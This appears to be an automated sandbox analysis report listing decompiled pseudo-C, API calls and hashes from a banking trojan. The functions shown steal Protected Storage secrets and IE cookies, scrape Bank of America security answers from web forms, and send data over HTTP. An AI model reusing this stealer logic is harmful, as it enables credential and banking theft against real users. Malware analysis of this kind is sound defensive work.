								__eflags = _t156;
								if(_t156 != 0) {
									continue;
								}
								_t157 = _v244;
								__eflags = _t157 - 2;
								if(_t157 <= 2) {
									continue;
								}
								__eflags = _t157;
								if(_t157 == 0) {
									continue;
								}
								_t221 = E0040CF2D(_t157);
								_v232 = _t221;
								__eflags = _t221;
								if(_t221 == 0) {
									continue;
								}
								 *_t227 = 0;
								_t200 = _v244;
								_t161 =  &(_v260[_t200]);
								_t235 = 0;
								_t228 = 0;
								__eflags =  *(_t161 - 1);
								if( *(_t161 - 1) != 0) {
									L29:
									__eflags = _t200;
									if(_t200 <= 0) {
										L34:
										__eflags =  *((char*)(_t235 + _t221 - 1)) - 0x7c;
										if( *((char*)(_t235 + _t221 - 1)) == 0x7c) {
											_t235 = _t235 - 1;
											__eflags = _t235;
										}
										_t162 = E0040D3D8(_v252);
										_v236 = _t162;
										_t229 = _t162 + _t235 + _v240;
										_t60 = _t229 + 6; // 0x6
										_t165 = E0040CEF9(_t60, _v256);
										_v264 = _t165;
										__eflags = _t165;
										if(_t165 != 0) {
											_v256 = _t165;
											_t167 = _t165 + _v240;
											_v260 = _t167;
											WideCharToMultiByte(0, 0, _v252, _v236, _t167, _v236, 0, 0);
											_v260 =  &(_v260[_v236]);
											 *_v260 = 0x20;
											_v260[1] = 0x3d;
											_v260[2] = 0x20;
											_v260 =  &(_v260[3]);
											E0040CF7C(_v260, _v232, _t235);
											 *((char*)(_t235 + _v272)) = 0xd;
											 *((char*)(_t235 + _v272 + 1)) = 0xa;
											_t230 = _t229 + 5;
											__eflags = _t230;
											 *((char*)(_t235 + _v272 + 2)) = 0;
											_v252 = _t230;
										}
										E0040CF40(_v232);
										_t233 = _v244;
										continue;
									} else {
										goto L30;
									}
									do {
										L30:
										_t178 =  *((intOrPtr*)(_t228 + _v260));
										__eflags = _t178;
										if(_t178 != 0) {
											_t179 = _t178 & 0x000000ff;
										} else {
											_t179 = 0x7c;
										}
										 *(_t228 + _t221) = _t179;
										_t228 = _t228 + 1;
										_t235 = _t235 + 1;
										__eflags = _t228 - _v244;
									} while (_t228 < _v244);
									goto L34;
								}
								__eflags =  *(_t161 - 2);
								if( *(_t161 - 2) != 0) {
									goto L29;
								}
								__eflags = _t200;
								if(_t200 <= 0) {
									goto L34;
								} else {
									goto L20;
								}
								do {
									L20:
									_t181 =  &(_v260[_t228]);
									_t203 =  *_t181;
									__eflags = _t203;
									if(_t203 != 0) {
										__eflags = _t181[0];
										L24:
										if(__eflags <= 0) {
											 *(_t235 + _t221) = _t203;
										} else {
											WideCharToMultiByte(0, 0, _t181, 1, _t235 + _t221, 1, 0, 0);
											_t221 = _v232;
										}
										goto L27;
									}
									__eflags = _t181[0];
									if(__eflags != 0) {
										goto L24;
									}
									 *(_t235 + _t221) = 0x7c;
									L27:
									_t228 = _t228 + 2;
									_t235 = _t235 + 1;
									__eflags = _t228 - _v244;
								} while (_t228 < _v244);
								goto L34;
							}
							_t183 = _v188;
							 *((intOrPtr*)( *_t183 + 8))(_t183);
						}
						_t185 = _v144;
						 *((intOrPtr*)( *_t185 + 8))(_t185);
					}
					_t187 = _v104;
					 *((intOrPtr*)( *_t187 + 8))(_t187);
					goto L45;
				}
			}
















































































    0x00404820
    0x00404828
    0x0040482a
    0x0040482e
    0x00404836
    0x0040483e
    0x00404842
    0x00404846
    0x0040484a
    0x00404850
    0x00404b26
    0x00404b31
    0x00404b35
    0x00404b40
    0x00404b42
    0x00404b48
    0x00404b52
    0x00404b59
    0x00404b5d
    0x00404b77
    0x00404b77
    0x00404b80
    0x00404b80
    0x00404b48
    0x00404b85
    0x00404b89
    0x00404b8d
    0x00404b8f
    0x00404b8f
    0x00404b9e
    0x00404baa
    0x00404bb3
    0x00404bba
    0x00404bc7
    0x00404bc7
    0x00404856
    0x00404857
    0x00404858
    0x00404859
    0x0040485d
    0x00404862
    0x00000000
    0x00000000
    0x00404868
    0x0040486e
    0x00000000
    0x00000000
    0x00404876
    0x0040487a
    0x0040487b
    0x0040487c
    0x0040487d
    0x00404883
    0x00404b1c
    0x00404b1c
    0x00404b20
    0x00404b23
    0x00000000
    0x00404889
    0x00404af8
    0x00404af8
    0x00404afe
    0x00404aff
    0x00404b03
    0x00404b04
    0x00404b06
    0x00404b0c
    0x00000000
    0x00000000
    0x0040488e
    0x00404896
    0x00000000
    0x00000000
    0x0040489c
    0x004048af
    0x004048b2
    0x004048b4
    0x00000000
    0x00000000
    0x00404ad4
    0x00404ad4
    0x00404ae3
    0x00404ae6
    0x00404ae8
    0x00000000
    0x00000000
    0x004048bf
    0x004048d7
    0x004048da
    0x004048dc
    0x00000000
    0x00000000
    0x004048e2
    0x004048e6
    0x00404ab0
    0x00404ab0
    0x00404abf
    0x00404ac2
    0x00404ac4
    0x00000000
    0x00000000
    0x004048fe
    0x00404900
    0x00404902
    0x00000000
    0x00000000
    0x00404908
    0x0040490c
    0x00000000
    0x00000000
    0x00404912
    0x00404916
    0x00000000
    0x00000000
    0x0040491c
    0x00404943
    0x00404946
    0x00404948
    0x00000000
    0x00000000
    0x0040494e
    0x00404952
    0x00404955
    0x00000000
    0x00000000
    0x0040495b
    0x0040495d
    0x00000000
    0x00000000
    0x00404968
    0x0040496a
    0x0040496e
    0x00404970
    0x00000000
    0x00000000
    0x00404978
    0x0040497b
    0x00404983
    0x00404985
    0x00404987
    0x00404989
    0x0040498c
    0x004049da
    0x004049da
    0x004049dc
    0x004049fc
    0x004049fc
    0x00404a01
    0x00404a03
    0x00404a03
    0x00404a03
    0x00404a08
    0x00404a15
    0x00404a1b
    0x00404a1e
    0x00404a21
    0x00404a26
    0x00404a2a
    0x00404a2c
    0x00404a34
    0x00404a38
    0x00404a41
    0x00404a4b
    0x00404a55
    0x00404a5d
    0x00404a64
    0x00404a71
    0x00404a75
    0x00404a7e
    0x00404a87
    0x00404a8f
    0x00404a98
    0x00404a98
    0x00404a9b
    0x00404a9f
    0x00404a9f
    0x00404aa7
    0x00404aac
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004049de
    0x004049de
    0x004049e2
    0x004049e5
    0x004049e7
    0x004049ee
    0x004049e9
    0x004049eb
    0x004049eb
    0x004049f1
    0x004049f4
    0x004049f5
    0x004049f6
    0x004049f6
    0x00000000
    0x004049de
    0x0040498e
    0x00404991
    0x00000000
    0x00000000
    0x00404993
    0x00404995
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404997
    0x00404997
    0x0040499b
    0x0040499d
    0x0040499f
    0x004049a1
    0x004049ae
    0x004049b1
    0x004049b1
    0x004049cc
    0x004049b3
    0x004049c0
    0x004049c6
    0x004049c6
    0x00000000
    0x004049b1
    0x004049a3
    0x004049a6
    0x00000000
    0x00000000
    0x004049a8
    0x004049cf
    0x004049d0
    0x004049d1
    0x004049d2
    0x004049d2
    0x00000000
    0x004049d8
    0x00404aca
    0x00404ad1
    0x00404ad1
    0x00404aee
    0x00404af5
    0x00404af5
    0x00404b12
    0x00404b19
    0x00000000
    0x00404b19

    APIs
    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00404819
    • GetProcAddress.KERNELBASE(00000000), ref: 00404820
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: IE Cookies:$:StringData$Empty$PStoreCreateInstance$Protected Storage:%S$Z%a$pstorec.dll
    • API String ID: 2574300362-834128494
    • Opcode ID: 0c7fb418351f2dc8134a40c8f316f7ec7165bf59963b11e0c9695d4b82e46b19
    • Instruction ID: 5bf581e770d34bfdbdc9ca802bf885e90b91d6fe0bfaa60cb6b6911d6373d2c8
    • Opcode Fuzzy Hash: 0c7fb418351f2dc8134a40c8f316f7ec7165bf59963b11e0c9695d4b82e46b19
    • Instruction Fuzzy Hash: C4C18FB1208341AFD710DF64C884E6BBBE9EFC8304F04892EF685A7291D779D945CB66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040BDB5, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162networkstringCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E0040BDB5(long _a4) {
				void _v8;
				void _v60;
				void _v1084;
				void* __ebx;
				void* __edi;
				char* _t62;
				char* _t67;
				int _t73;
				intOrPtr _t78;
				intOrPtr _t82;
				void* _t101;
				signed int _t103;
				char* _t108;
				void* _t109;
				char* _t110;
				char** _t113;

				E00410635();
				_t113 = _a4;
				_t113[3] = 0;
				_t113[1][8] = InternetOpenA( *0x413488, 0, 0, 0, 0);
				_t62 = _t113[1];
				_t101 = _t62[8];
				if(_t101 == 0) {
					L19:
					return _t62;
				}
				_t113[1][0xc] = InternetConnectA(_t101, _t113[2][0x10], _t113[2][0x18] & 0x0000ffff, 0, 0, 3, 0, 0);
				_t62 = _t113[1];
				if(_t62[0xc] == 0) {
					goto L19;
				}
				_push(_t109);
				_t110 = E0040A2AA(0,  *_t113, _t109, _t113[2][0x2c]);
				_t67 = _t113[2];
				if(_t67[0xc] != 4) {
					_t103 = 0;
				} else {
					_t103 = 0x800000;
				}
				_t108 = _t110;
				if(_t110 == 0) {
					_t108 = _t67[0x2c];
				}
				_t113[1][0x10] = HttpOpenRequestA(_t113[1][0xc],  &(( *_t113)[0x404]), _t108, 0,  *_t113, 0, _t103 | 0x8004f200, 0);
				E0040CF40(_t110);
				_t73 = _t113[1];
				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
					_a4 = 0x31;
					if(HttpQueryInfoA(( *_t113)[0x420], 0x80000001,  &_v60,  &_a4, 0) == 0 || _a4 == 0) {
						_t78 =  *0x412a64; // 0x246f5a8
						 *0x412cd8( &_v60,  *((intOrPtr*)(_t78 + 0x11c)));
					}
					_t82 =  *0x412a64; // 0x246f5a8
					wnsprintfA( &_v1084, 0x3ff,  *(_t82 + 0x120),  &_v60,  *0x412c14);
					HttpAddRequestHeadersA(_t113[1][0x10],  &_v1084, 0xffffffff, 0xa0000000);
					InternetSetStatusCallback(_t113[1][0x10], E0040BD6C);
					_t73 = HttpSendRequestA(_t113[1][0x10], 0, 0, ( *_t113)[0x418], ( *_t113)[0x41c]);
					if(_t73 != 0) {
						_a4 = 4;
						_v8 = 0;
						_t73 = HttpQueryInfoA(_t113[1][0x10], 0x20000013,  &_v8,  &_a4, 0);
						if(_t73 != 0 && _v8 == 0xc8) {
							_a4 = 0x3ff;
							_t73 = InternetQueryOptionA(_t113[1][0x10], 0x22,  &_v1084,  &_a4);
							if(_t73 != 0 && _a4 > 5) {
								_t73 = E0040AF73( &_v1084, _a4);
							}
							_t113[3] = 1;
						}
					}
				}
				return _t73;
			}



















    0x0040bdc0
    0x0040bdc5
    0x0040bdce
    0x0040bde0
    0x0040bde3
    0x0040bde6
    0x0040bdeb
    0x0040bfa3
    0x0040bfa3
    0x0040bfa3
    0x0040be0c
    0x0040be0f
    0x0040be15
    0x00000000
    0x00000000
    0x0040be20
    0x0040be29
    0x0040be2b
    0x0040be32
    0x0040be3b
    0x0040be34
    0x0040be34
    0x0040be34
    0x0040be3d
    0x0040be41
    0x0040be43
    0x0040be43
    0x0040be6a
    0x0040be6d
    0x0040be72
    0x0040be78
    0x0040be8e
    0x0040bea3
    0x0040beaa
    0x0040beb9
    0x0040beb9
    0x0040bec9
    0x0040bee1
    0x0040befe
    0x0040bf0f
    0x0040bf2b
    0x0040bf33
    0x0040bf46
    0x0040bf4d
    0x0040bf53
    0x0040bf5b
    0x0040bf76
    0x0040bf7c
    0x0040bf84
    0x0040bf96
    0x0040bf96
    0x0040bf9b
    0x0040bf9b
    0x0040bf5b
    0x0040bf33
    0x00000000

    APIs
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040BDD7
    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040BE03
      • Part of subcall function 0040A2AA: lstrcpy.KERNEL32(00000001,?), ref: 0040A331
    • HttpOpenRequestA.WININET(00000004,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0040BE60
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040BE9B
    • lstrcpy.KERNEL32(?,?), ref: 0040BEB9
    • wnsprintfA.SHLWAPI ref: 0040BEE1
    • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0040BEFE
    • InternetSetStatusCallback.WININET(?,Function_0000BD6C), ref: 0040BF0F
    • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 0040BF2B
    • HttpQueryInfoA.WININET(?,20000013,?,00000031,00000000), ref: 0040BF53
    • InternetQueryOptionA.WININET(?,00000022,?,00000004), ref: 0040BF7C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Internet$QueryRequest$InfoOpenlstrcpy$CallbackConnectHeadersOptionSendStatuswnsprintf
    • String ID: 1
    • API String ID: 1779409970-2212294583
    • Opcode ID: 92d497b16d25733145a1f94eef0f9c72893bcef14c4fa68f5a5e1f7939826c96
    • Instruction ID: fe3cf48f98d7f98dea3a5e6690be7ea256b15321735be77a60689f8df72db9f7
    • Opcode Fuzzy Hash: 92d497b16d25733145a1f94eef0f9c72893bcef14c4fa68f5a5e1f7939826c96
    • Instruction Fuzzy Hash: A95138B1100208AFDB20DF54DD84E9ABBE9EF08344B00847AF649D72A1D775ED91CFA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F5DA, Relevance: 21.0, APIs: 7, Strings: 5, Instructions: 49libraryloadermemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F5DA() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;

				_t11 =  *0x413e64; // 0x0
				if(_t11 != 0) {
					L9:
					 *0x413e64 =  *0x413e64 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x413e60 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x41348c = GetProcAddress(_t2, "FCICreate");
						 *0x413e50 = GetProcAddress( *0x413e60, "FCIAddFile");
						 *0x412e58 = GetProcAddress( *0x413e60, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x413e60, "FCIDestroy");
						 *0x413e54 = _t7;
						_t13 =  *0x41348c; // 0x0
						if(_t13 == 0) {
							L7:
							FreeLibrary( *0x413e60);
							goto L8;
						} else {
							_t14 =  *0x413e50; // 0x0
							if(_t14 == 0) {
								goto L7;
							} else {
								_t15 =  *0x412e58; // 0x0
								if(_t15 == 0 || _t7 == 0) {
									goto L7;
								} else {
									_t9 = HeapCreate(0, 0x80000, 0);
									 *0x412e54 = _t9;
									if(_t9 != 0) {
										goto L9;
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
			}










    0x0040f5dd
    0x0040f5e3
    0x0040f696
    0x0040f696
    0x0040f69f
    0x0040f5e9
    0x0040f5ee
    0x0040f5f4
    0x0040f5fb
    0x0040f692
    0x0040f695
    0x0040f601
    0x0040f618
    0x0040f62e
    0x0040f644
    0x0040f649
    0x0040f64f
    0x0040f654
    0x0040f65a
    0x0040f686
    0x0040f68c
    0x00000000
    0x0040f65c
    0x0040f65c
    0x0040f662
    0x00000000
    0x0040f664
    0x0040f664
    0x0040f66a
    0x00000000
    0x0040f670
    0x0040f677
    0x0040f67d
    0x0040f684
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040f684
    0x0040f66a
    0x0040f662
    0x0040f65a
    0x0040f5fb

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040F6C9,00000000,0040F9A3,?,00000000,00000000, L@,00410FEB,?, L@,?), ref: 0040F5EE
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040F607
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 0040F61D
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040F633
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 0040F649
    • HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 0040F677
    • FreeLibrary.KERNEL32 ref: 0040F68C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: 097412f56266bd36ef309ed4c7695226415d161bcf2d39e9eb55e0e407248bec
    • Instruction ID: 9952e9b797d368164eb3b3484047c6e5c5b9c7b8af44aa4ee88c4e482b6cf487
    • Opcode Fuzzy Hash: 097412f56266bd36ef309ed4c7695226415d161bcf2d39e9eb55e0e407248bec
    • Instruction Fuzzy Hash: F8111875A453209BCB226FA0FD085DA7F65B708B03310C93AF501E26B0D6FA4A569F8C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A34A, Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 375stringnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E0040A34A(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				signed int _v9;
				char _v16;
				char* _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				char* _v40;
				char _v1064;
				void* _t127;
				void* _t132;
				char _t134;
				signed int _t144;
				char _t145;
				signed int _t157;
				char _t158;
				char* _t159;
				char* _t163;
				signed int _t168;
				intOrPtr _t169;
				char* _t170;
				intOrPtr _t173;
				int _t175;
				signed int _t178;
				void* _t180;
				intOrPtr _t182;
				intOrPtr _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t193;
				intOrPtr _t194;
				intOrPtr* _t196;
				char* _t197;
				char* _t198;
				char _t199;
				intOrPtr _t201;
				intOrPtr _t203;
				void* _t216;
				void* _t219;
				void* _t223;
				void* _t224;
				void* _t226;
				char _t227;
				char* _t228;
				void* _t230;
				intOrPtr* _t233;
				void* _t234;
				intOrPtr _t235;
				intOrPtr* _t236;
				char* _t237;
				signed int _t238;
				void* _t239;
				void* _t240;

				_t230 = __esi;
				_t219 = __edi;
				_t193 = __ebx;
				 *0x412cd8( &_v1064, _a4);
				_t127 = E0040D3C6( &_v1064);
				while(1) {
					_t127 = _t127 - 1;
					if(_t127 == 0) {
						break;
					}
					if( *((char*)(_t239 + _t127 - 0x424)) != 0x2f) {
						continue;
					}
					_t201 =  *0x412a64; // 0x246f5a8
					 *0x412cd8(_t239 + _t127 - 0x423,  *((intOrPtr*)(_t201 + 0x144)), _t219);
					E00410635();
					_t132 = InternetOpenA( *0x413488, 0, 0, 0, 0);
					if(_t132 == 0 || InternetOpenUrlA(_t132,  &_v1064, 0, 0, 0x84043300, 0) == 0) {
						L95:
						break;
					} else {
						_push(_t230);
						_t134 = E004060CC( &_v1064,  &_v36, 0xffff, _t133);
						_v8 = _t134;
						if(_t134 == 0) {
							L94:
							goto L95;
						}
						_t233 = _v36;
						_push(_t193);
						_t194 = 0;
						_t216 = 0;
						_t223 = "*<select " - _t233;
						do {
							_t203 =  *((intOrPtr*)(_t223 + _t233));
							if(_t203 - 0x41 <= 0x19) {
								_t203 = _t203 + 0x20;
							}
							if(_t203 != 0x23) {
								__eflags = _t203 - 0x2a;
								if(_t203 == 0x2a) {
									_t16 = _t216 + 1; // 0x1
									__eflags = _t16 - 9;
									if(__eflags != 0) {
										__eflags = _t194 - _v8;
										if(_t194 >= _v8) {
											goto L93;
										}
										_t224 = 8;
										_t225 = _t224 - _t216;
										__eflags = _t224 - _t216;
										_t20 = _t216 + "<select "; // 0x4036b1
										_t234 = _t20;
										while(1) {
											_t144 = E00408C0D(_t234, _t225, _v36 + _t194, _v8 - _t194,  &_v16, 0, 0);
											__eflags = _t144;
											if(_t144 != 0) {
												break;
											}
											_t194 = _t194 + 1;
											__eflags = _t194 - _v8;
											if(_t194 < _v8) {
												continue;
											}
											goto L93;
										}
										_t25 =  &_v16;
										 *_t25 = _v16 + _t194;
										__eflags =  *_t25;
										L28:
										_t145 = _v16;
										_v28 = _v28 & 0x00000000;
										_v32 = _v32 & 0x00000000;
										_v8 = _v8 - _t145;
										_t196 = _t145 + _v36;
										_v9 = 0;
										do {
											_v20 = "*<option  selected";
											_t235 = 0;
											_t226 = 0;
											_v20 = _v20 - _t196;
											_t218 = _t196;
											do {
												_t206 = _v20[_t218];
												if(_t206 - 0x41 <= 0x19) {
													_t206 = _t206 + 0x20;
												}
												if(_t206 != 0x23) {
													__eflags = _t206 - 0x2a;
													if(_t206 == 0x2a) {
														_t44 = _t226 + 1; // 0x1
														__eflags = _t44 - 0x12;
														if(__eflags != 0) {
															__eflags = _t235 - _v8;
															if(__eflags >= 0) {
																goto L91;
															}
															_v20 = 0x11;
															_t49 =  &_v20;
															 *_t49 = _v20 - _t226;
															__eflags =  *_t49;
															_t51 = _t226 + "<option  selected"; // 0x74706f3c
															_t227 = _t51;
															while(1) {
																_t218 = _v20;
																_t206 = _t227;
																_t157 = E00408C0D(_t227, _v20, _t235 + _t196, _v8 - _t235,  &_v16, 0, 0);
																__eflags = _t157;
																if(_t157 != 0) {
																	break;
																}
																_t235 = _t235 + 1;
																__eflags = _t235 - _v8;
																if(__eflags < 0) {
																	continue;
																}
																goto L91;
															}
															_t57 =  &_v16;
															 *_t57 = _v16 + _t235;
															__eflags =  *_t57;
															L51:
															_t158 = _v16;
															_t197 = _t196 + _t158;
															_t60 =  &_v8;
															 *_t60 = _v8 - _t158;
															if( *_t60 == 0) {
																goto L91;
															}
															while( *_t197 != 0x3e) {
																_t197 = _t197 + 1;
																_t62 =  &_v8;
																 *_t62 = _v8 - 1;
																if( *_t62 != 0) {
																	continue;
																}
																break;
															}
															if(_v8 == 0) {
																goto L91;
															}
															_t198 = _t197 + 1;
															_t206 = _v8 + _t198;
															_v40 = _t198;
															_t159 = _t198;
															if(_t198 >= _t206) {
																L58:
																if(_t159 == _t206) {
																	goto L91;
																}
																_t206 = _t159 - _t198;
																if(_t159 - _t198 > 0x200) {
																	goto L91;
																}
																_v8 = _v8 + _t198 - _t159;
																_t236 = _t159 + 1;
																_t228 = 0;
																_v24 = "*<input *value=\"";
																_v24 = _v24 - _t236;
																 *_t159 = 0;
																_v20 = 0;
																_t218 = _t236;
																do {
																	_t206 = _v24[_t218];
																	if(_t206 - 0x41 <= 0x19) {
																		_t206 = _t206 + 0x20;
																	}
																	if(_t206 != 0x23) {
																		__eflags = _t206 - 0x2a;
																		if(_t206 == 0x2a) {
																			_t163 = _v20;
																			_t82 = _t163 + 1; // 0x12
																			_t206 = _t82;
																			__eflags = _t82 - 0x10;
																			if(__eflags != 0) {
																				__eflags = _t228 - _v8;
																				if(__eflags >= 0) {
																					goto L91;
																				}
																				_v24 = 0xf;
																				_t87 =  &_v24;
																				 *_t87 = _v24 - _t163;
																				__eflags =  *_t87;
																				_t89 = _t163 + "<input *value=\""; // 0x4036e2
																				_t199 = _t89;
																				while(1) {
																					_t218 = _v24;
																					_t206 = _t199;
																					_t168 = E00408C0D(_t199, _v24, _t228 + _t236, _v8 - _t228,  &_v16, 0, 0);
																					__eflags = _t168;
																					if(_t168 != 0) {
																						break;
																					}
																					_t228 = _t228 + 1;
																					__eflags = _t228 - _v8;
																					if(__eflags < 0) {
																						continue;
																					}
																					goto L91;
																				}
																				_t95 =  &_v16;
																				 *_t95 = _v16 + _t228;
																				__eflags =  *_t95;
																				_t196 = _v40;
																				L82:
																				_t169 = _v16;
																				_v8 = _v8 - _t169;
																				_t237 = _t236 + _t169;
																				_t206 = _v8 + _t237;
																				_t170 = _t237;
																				if(_t237 >= _t206) {
																					L85:
																					if(_t170 == _t206) {
																						goto L91;
																					}
																					_t206 = _t170 - _t237;
																					if(_t170 - _t237 > 0x200) {
																						goto L91;
																					}
																					 *_t170 = 0;
																					_t173 =  *0x412a64; // 0x246f5a8
																					_t175 = wnsprintfA( &_v1064, 0x400,  *(_t173 + 0x148), (_v9 & 0x000000ff) + 1, _t196, (_v9 & 0x000000ff) + 1, _t237);
																					_t229 = _t175;
																					_t240 = _t240 + 0x1c;
																					_t238 = _t175 + _v32;
																					_t178 = E0040CEF9(_t238 + 0xa, _v28);
																					if(_t178 == 0) {
																						E0040CF40(_v28);
																						_t118 =  &_v32;
																						 *_t118 = _v32 & 0x00000000;
																						__eflags =  *_t118;
																						goto L91;
																					}
																					goto L88;
																				}
																				while( *_t170 != 0x22) {
																					_t170 = _t170 + 1;
																					if(_t170 < _t206) {
																						continue;
																					}
																					goto L85;
																				}
																				goto L85;
																			}
																			_v16 = _v8;
																			goto L82;
																		}
																		_t182 =  *_t218;
																		__eflags = _t182 - 0x41;
																		if(_t182 < 0x41) {
																			L70:
																			_t183 = _t182;
																			L71:
																			__eflags = _t206 - _t183;
																			if(__eflags != 0) {
																				goto L91;
																			}
																			goto L72;
																		}
																		__eflags = _t182 - 0x5a;
																		if(_t182 > 0x5a) {
																			goto L70;
																		}
																		_t183 = _t182 + 0x20;
																		goto L71;
																	} else {
																		if(_t228 == _v8) {
																			goto L91;
																		}
																	}
																	L72:
																	_t228 = _t228 + 1;
																	_t218 = _t218 + 1;
																	_v20 =  &(_v20[1]);
																} while (_v20 != 0x10);
																_v16 = _t228;
																goto L82;
															}
															while( *_t159 != 0x3c) {
																_t159 = _t159 + 1;
																if(_t159 < _t206) {
																	continue;
																}
																goto L58;
															}
															goto L58;
														}
														_v16 = _v8;
														goto L51;
													}
													_t186 =  *_t218;
													__eflags = _t186 - 0x41;
													if(_t186 < 0x41) {
														L39:
														_t187 = _t186;
														L40:
														__eflags = _t206 - _t187;
														if(__eflags != 0) {
															goto L91;
														}
														goto L41;
													}
													__eflags = _t186 - 0x5a;
													if(_t186 > 0x5a) {
														goto L39;
													}
													_t187 = _t186 + 0x20;
													goto L40;
												} else {
													if(_t235 == _v8) {
														L91:
														_t282 = _v32;
														if(_v32 != 0) {
															E00410EC7(_t206, _t218, _t282, 0xc9, 0, 0, L"BOFA answers:\n\n%S", _v28);
															E0040CF40(_v28);
														}
														goto L93;
													}
												}
												L41:
												_t235 = _t235 + 1;
												_t218 = _t218 + 1;
												_t226 = _t226 + 1;
											} while (_t226 != 0x12);
											_v16 = _t235;
											goto L51;
											L88:
											_t206 = _v32 + _t178;
											_v28 = _t178;
											_t180 = E0040CF7C(_v32 + _t178,  &_v1064, _t229);
											_v9 = _v9 + 1;
											_v32 = _t238;
											 *((char*)(_t180 + _t238)) = 0;
										} while (_v9 < 3);
										goto L91;
									}
									_v16 = _v8;
									goto L28;
								}
								_t190 =  *_t233;
								__eflags = _t190 - 0x41;
								if(_t190 < 0x41) {
									L16:
									_t191 = _t190;
									L17:
									__eflags = _t203 - _t191;
									if(__eflags != 0) {
										goto L93;
									}
									goto L18;
								}
								__eflags = _t190 - 0x5a;
								if(_t190 > 0x5a) {
									goto L16;
								}
								_t191 = _t190 + 0x20;
								goto L17;
							} else {
								if(_t194 == _v8) {
									L93:
									E0040CF40(_v36);
									goto L94;
								}
							}
							L18:
							_t194 = _t194 + 1;
							_t233 = _t233 + 1;
							_t216 = _t216 + 1;
						} while (_t216 != 9);
						_v16 = _t194;
						goto L28;
					}
				}
				return E0040CF40(_a4);
			}



























































    0x0040a34a
    0x0040a34a
    0x0040a34a
    0x0040a35d
    0x0040a369
    0x0040a36e
    0x0040a36e
    0x0040a36f
    0x00000000
    0x00000000
    0x0040a37d
    0x00000000
    0x00000000
    0x0040a37f
    0x0040a394
    0x0040a39a
    0x0040a3ab
    0x0040a3b3
    0x0040a776
    0x00000000
    0x0040a3d7
    0x0040a3d7
    0x0040a3e1
    0x0040a3e6
    0x0040a3eb
    0x0040a775
    0x00000000
    0x0040a775
    0x0040a3f1
    0x0040a3f4
    0x0040a3fa
    0x0040a3fc
    0x0040a3fe
    0x0040a400
    0x0040a400
    0x0040a409
    0x0040a40b
    0x0040a40b
    0x0040a411
    0x0040a41e
    0x0040a421
    0x0040a450
    0x0040a453
    0x0040a456
    0x0040a460
    0x0040a463
    0x00000000
    0x00000000
    0x0040a46b
    0x0040a46c
    0x0040a46c
    0x0040a46e
    0x0040a46e
    0x0040a474
    0x0040a48c
    0x0040a491
    0x0040a493
    0x00000000
    0x00000000
    0x0040a495
    0x0040a496
    0x0040a499
    0x00000000
    0x00000000
    0x00000000
    0x0040a49b
    0x0040a4a0
    0x0040a4a0
    0x0040a4a0
    0x0040a4a3
    0x0040a4a3
    0x0040a4a9
    0x0040a4ad
    0x0040a4b1
    0x0040a4b4
    0x0040a4b7
    0x0040a4bb
    0x0040a4bb
    0x0040a4c2
    0x0040a4c4
    0x0040a4c6
    0x0040a4c9
    0x0040a4cb
    0x0040a4ce
    0x0040a4d7
    0x0040a4d9
    0x0040a4d9
    0x0040a4df
    0x0040a4ec
    0x0040a4ef
    0x0040a51e
    0x0040a521
    0x0040a524
    0x0040a52e
    0x0040a531
    0x00000000
    0x00000000
    0x0040a537
    0x0040a53e
    0x0040a53e
    0x0040a53e
    0x0040a541
    0x0040a541
    0x0040a547
    0x0040a547
    0x0040a55c
    0x0040a55e
    0x0040a563
    0x0040a565
    0x00000000
    0x00000000
    0x0040a567
    0x0040a568
    0x0040a56b
    0x00000000
    0x00000000
    0x00000000
    0x0040a56d
    0x0040a572
    0x0040a572
    0x0040a572
    0x0040a575
    0x0040a575
    0x0040a578
    0x0040a57a
    0x0040a57a
    0x0040a57d
    0x00000000
    0x00000000
    0x0040a583
    0x0040a588
    0x0040a589
    0x0040a589
